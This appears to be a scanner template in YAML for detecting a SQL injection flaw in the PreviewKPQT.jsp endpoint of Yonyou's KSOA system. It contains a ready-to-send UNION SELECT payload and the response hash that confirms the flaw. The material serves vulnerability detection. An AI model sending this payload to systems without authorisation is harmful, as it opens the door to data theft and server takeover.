33 lines
1.1 KiB
YAML
33 lines
1.1 KiB
YAML
keyword: KSOA
|
||
name: 用友时空KSOA系统SQL注入漏洞
|
||
description: |
|
||
用友时空KSOA系统接口PreviewKPQT.jsp存在SQL注入漏洞
|
||
requests: # 为空代表默认或者不启用
|
||
path: "/kp/PreviewKPQT.jsp?KPQType=KPQT&KPQTID=1%27+union+select+sys.fn_varbintohexstr(hashbytes(%27md5%27,%27test%27)),2,3+--+"
|
||
method: GET
|
||
headers:
|
||
User-agent:
|
||
Content-length:
|
||
Accept:
|
||
Content-type:
|
||
Accept-Encoding:
|
||
Cookie:
|
||
Referer:
|
||
X-Forwarded-For:
|
||
body-raw: |-
|
||
|
||
|
||
response:
|
||
path: "" # 不填则默认接收此请求的响应包
|
||
status-code: 200
|
||
body: "098f6bcd4621d373cade4e832627b4f6" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
|
||
time: # 此处填写响应包响应时间,默认不启用
|
||
headers:
|
||
Server:
|
||
Content-type:
|
||
Content-length:
|
||
Date:
|
||
Connection:
|
||
impact: |
|
||
用友时空KSOA接口 /kp/PreviewKPQT.jsp 接口存在SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
|